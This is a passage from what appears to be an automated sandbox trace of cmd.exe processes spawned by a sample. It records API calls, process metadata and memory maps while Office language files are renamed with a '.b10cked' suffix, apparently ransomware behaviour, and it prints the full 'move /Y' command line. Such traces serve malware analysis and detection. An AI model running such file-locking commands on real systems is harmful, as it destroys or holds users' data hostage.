lpBuffer=0x20f678 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.893] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f678, lpFilePart=0x20f674 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f674*="Desktop") returned 0x18 [0154.893] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0154.893] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f3f4 | out: lpFindFileData=0x20f3f4) returned 0x3709f0 [0154.894] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0154.894] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f3f4 | out: lpFindFileData=0x20f3f4) returned 0x3709f0 [0154.894] 
FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0154.894] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f3f4 | out: lpFindFileData=0x20f3f4) returned 0x3709f0 [0154.894] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0154.894] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0154.894] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0154.894] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0154.894] GetEnvironmentStringsW () returned 0x370210* [0154.894] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0154.894] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.895] GetConsoleOutputCP () returned 0x1b5 [0154.895] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.895] GetUserDefaultLCID () returned 0x409 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f7b8, cchData=128 | out: lpLCData="0") returned 2 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f7b8, cchData=128 | out: lpLCData="0") returned 2 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f7b8, cchData=128 | out: lpLCData="1") returned 2 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0154.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0154.896] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0154.896] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0154.896] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0154.897] GetConsoleTitleW (in: lpConsoleTitle=0x360930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.897] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0154.897] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0154.897] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0154.897] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0154.897] _wcsicmp (_String1="move", _String2=")") returned 68 [0154.897] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0154.897] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0154.898] _wcsicmp (_String1="IF", _String2="move") returned -4 [0154.898] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0154.898] _wcsicmp (_String1="REM", _String2="move") returned 5 [0154.898] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0154.901] GetConsoleTitleW (in: lpConsoleTitle=0x20f4b0, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.901] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0154.901] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0154.901] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0154.901] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0154.901] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0154.901] _wcsicmp (_String1="move", _String2="CD") returned 10 [0154.901] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0154.901] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0154.901] _wcsicmp (_String1="move", _String2="REN") returned -5 [0154.901] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0154.901] _wcsicmp (_String1="move", _String2="SET") returned -6 [0154.901] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0154.901] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0154.901] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0154.901] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0154.902] _wcsicmp (_String1="move", _String2="MD") returned 11 [0154.902] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0154.902] _wcsicmp (_String1="move", _String2="RD") returned -5 [0154.902] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0154.902] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0154.902] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0154.902] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0154.902] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0154.902] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0154.902] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0154.902] _wcsicmp (_String1="move", _String2="VER") returned -9 [0154.902] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0154.902] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0154.902] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0154.902] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0154.902] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0154.902] _wcsicmp (_String1="move", _String2="START") returned -6 [0154.902] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0154.902] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0154.902] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0154.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0154.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0154.904] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f26c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f264, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f264*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0154.904] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0154.905] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0154.906] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0154.906] _wcsicmp (_String1="OMSINT~1.TRX", _String2=".") returned 65 [0154.906] _wcsicmp 
(_String1="OMSINT~1.TRX", _String2="..") returned 65 [0154.906] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsint~1.trx")) returned 0x2020 [0154.906] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.906] SetErrorMode (uMode=0x0) returned 0x0 [0154.906] SetErrorMode (uMode=0x1) returned 0x0 [0154.906] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", nBufferLength=0x104, lpBuffer=0x20ebf4, lpFilePart=0x20ebdc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", lpFilePart=0x20ebdc*="OMSINT~1.TRX") returned 0x3c [0154.906] SetErrorMode (uMode=0x0) returned 0x1 [0154.906] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0154.906] _wcsicmp (_String1="OMSINT~1.TRX", _String2=".") returned 65 [0154.906] _wcsicmp (_String1="OMSINT~1.TRX", _String2="..") returned 65 [0154.907] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsint~1.trx")) returned 0x2020 [0154.907] SetErrorMode (uMode=0x0) returned 0x0 [0154.907] SetErrorMode (uMode=0x1) returned 0x0 [0154.907] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", nBufferLength=0x104, lpBuffer=0x20f070, lpFilePart=0x20ee08 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", lpFilePart=0x20ee08*="OMSINT~1.TRX") returned 0x3c [0154.907] SetErrorMode (uMode=0x0) returned 0x1 [0154.907] SetErrorMode (uMode=0x0) returned 0x0 [0154.907] SetErrorMode (uMode=0x1) returned 0x0 [0154.907] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f278, lpFilePart=0x20ee08 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked", lpFilePart=0x20ee08*="OMSINTL.DLL.trx_dll.b10cked") returned 0x4b [0154.907] SetErrorMode (uMode=0x0) returned 0x1 [0154.907] SetLastError (dwErrCode=0x0) [0154.907] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsintl.dll.trx_dll.b10cked")) returned 0xffffffff [0154.907] GetLastError () returned 0x2 [0154.907] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x20e784, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e784) returned 0x372130 [0154.907] FindNextFileW (in: hFindFile=0x372130, lpFindFileData=0x20e784 | out: lpFindFileData=0x20e784) returned 0 [0154.908] GetLastError () returned 0x12 [0154.908] FindClose (in: hFindFile=0x372130 | out: hFindFile=0x372130) returned 1 [0154.909] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x371cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371cc0) returned 0x372130 [0154.910] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20ea1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0154.910] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x20ea1c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0154.910] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsintl.dll.trx_dll")) returned 0x2020 [0154.910] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\omsintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0154.911] FindClose (in: hFindFile=0x372130 | out: hFindFile=0x372130) returned 1 [0154.911] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e9d0 | out: _Buffer=" 1") returned 9 [0154.911] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.911] GetFileType (hFile=0x7) returned 0x2 [0154.911] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0154.911] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e95c | out: lpMode=0x20e95c) returned 1 [0154.911] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.911] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e990 | out: lpConsoleScreenBufferInfo=0x20e990) returned 1 [0154.912] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0154.912] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e9d0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0154.912] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x20e9b4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e9b4*=0x1a) returned 1 [0154.912] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.912] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0154.912] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.912] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0154.913] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.913] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0154.913] SetConsoleInputExeNameW () returned 0x1 [0154.913] GetConsoleOutputCP () returned 0x1b5 [0154.913] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.913] SetThreadUILanguage (LangId=0x0) returned 0x409 [0154.913] exit (_Code=0) Process: id = "258" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0xea4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21296 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21297 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21298 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21299 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 21300 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21301 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21302 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21303 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21304 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21305 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21376 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21377 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21378 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21379 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 21380 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 21381 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21382 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21383 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21384 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21385 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21386 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21387 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21388 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21389 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21390 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 21391 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21392 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21393 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21394 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21395 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 21396 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 21397 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 21398 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 21399 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001230000" filename = "" Thread: id = 321 os_tid = 0xd34 [0155.089] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcb4 | out: lpSystemTimeAsFileTime=0x1cfcb4*(dwLowDateTime=0x9660dc80, dwHighDateTime=0x1d440a9)) [0155.089] GetCurrentProcessId () returned 0xea4 [0155.089] GetCurrentThreadId () returned 0xd34 [0155.089] GetTickCount () returned 0x2fac2 [0155.089] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfcac | out: lpPerformanceCount=0x1cfcac*=21187858478) returned 1 [0155.090] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0155.090] __set_app_type (_Type=0x1) [0155.090] __p__fmode () returned 0x76b331f4 [0155.090] __p__commode () returned 0x76b331fc [0155.090] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0155.090] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0155.091] GetCurrentThreadId () returned 0xd34 [0155.091] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd34) returned 0x38 [0155.091] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0155.091] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0155.091] SetThreadUILanguage (LangId=0x0) returned 0x409 [0155.091] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0155.091] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfc44 